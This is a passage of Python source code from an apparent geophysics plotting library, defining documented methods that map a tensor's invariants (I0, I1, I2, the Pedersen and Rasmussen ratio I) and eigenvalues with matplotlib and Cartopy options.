minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
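# Example (a sketch continuing the one in compute_invar above; the file
# name is a placeholder):
# >>> fig, ax = tensor.plot(colorbar='bottom', show=False,
# ...                       fname='tensor_components.png')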
def plot_i0(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the first invariant I0 (the trace) of the tensor
I0 = vxx + vyy + vzz
which should be identically zero.
Usage
-----
x.plot_i0([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = 'Tr $V_{ij}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i0_label
if self.i0 is None:
self.compute_invar()
return self.i0.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_i1(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the second invariant I1 of the tensor:
I1 = vxx*vyy + vyy*vzz + vxx*vzz - vxy**2 - vyz**2 - vxz**2
Usage
-----
x.plot_i1([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$I_1$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i1_label
if self.i1 is None:
self.compute_invar()
return self.i1.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_i2(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the third invariant I2 (the determinant) of the tensor:
I2 = vxx*(vyy*vzz - vyz**2) + vxy*(vyz*vxz - vxy*vzz)
+ vxz*(vxy*vyz - vxz*vyy)
Usage
-----
x.plot_i2([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = 'det $V_{ij}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i2_label
if self.i2 is None:
self.compute_invar()
return self.i2.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_i(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
        Plot the dimensionless quantity I of Pedersen and Rasmussen (1990),
        I = -(I2/2)**2 / (I1/3)**3,
        which is bounded by 0 and 1.
Usage
-----
x.plot_i([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$-(I_2/2)^{2} / (I_1/3)^{3}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i_label
if self.i is None:
self.compute_invar()
return self.i.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
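    # Sketch: the dimensionless ratio I can also be inspected numerically.
    # Assuming `tensor` is an instance of this class (see the sketch after
    # plot_i0), the gridded values should lie within [0, 1]:
    #
    #     tensor.compute_invar()
    #     data = tensor.i.data             # 2-D numpy array of I values
    #     print(data.min(), data.max())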

    def plot_invar(self, projection=None, tick_interval=[60, 60],
minor_tick_interval=[30, 30], xlabel='',
ylabel='', colorbar='bottom', cmap='viridis',
cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=9,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the three invariants of the tensor and the derived quantity I.
Usage
-----
x.plot_invar([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, axes_labelsize, tick_labelsize, ax, show,
fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [60, 60]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 9
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
        if colorbar is not None:
            # Scale the figure height for the colorbar placement: maps with
            # horizontal colorbars need a taller figure than vertical ones.
            if colorbar in ('bottom', 'top'):
                scale = 0.8
            else:
                scale = 0.5
        else:
            scale = 0.6
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(2, 2, figsize=figsize)
self.plot_i0(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_i1(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval, cb_offset=cb_offset,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_i2(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval, cb_offset=cb_offset,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_i(projection=projection, ax=ax.flat[3],
tick_interval=tick_interval, cb_offset=cb_offset,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
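    # Sketch: plot_invar arranges I0, I1, I2 and I on a 2x2 grid and returns
    # the figure and axes, which can be customized before saving. Assuming
    # `tensor` as above:
    #
    #     fig, ax = tensor.plot_invar(colorbar='bottom', show=False)
    #     ax.flat[3].set_title('Pedersen & Rasmussen I')
    #     fig.savefig('invariants.png')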

    def plot_eig1(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the first eigenvalue of the tensor.
Usage
-----
x.plot_eig1([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_1$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eig1_label
if self.eig1 is None:
self.compute_eig()
return self.eig1.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
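    # Sketch: the eigenvalue grids are computed on demand, but compute_eig()
    # can be called explicitly to work with the data before plotting.
    # Assuming `tensor` as above:
    #
    #     tensor.compute_eig()
    #     lam1 = tensor.eig1.data   # 2-D numpy array of the first eigenvalue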

    def plot_eig2(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the second eigenvalue of the tensor.
Usage
-----
x.plot_eig2([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_2$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
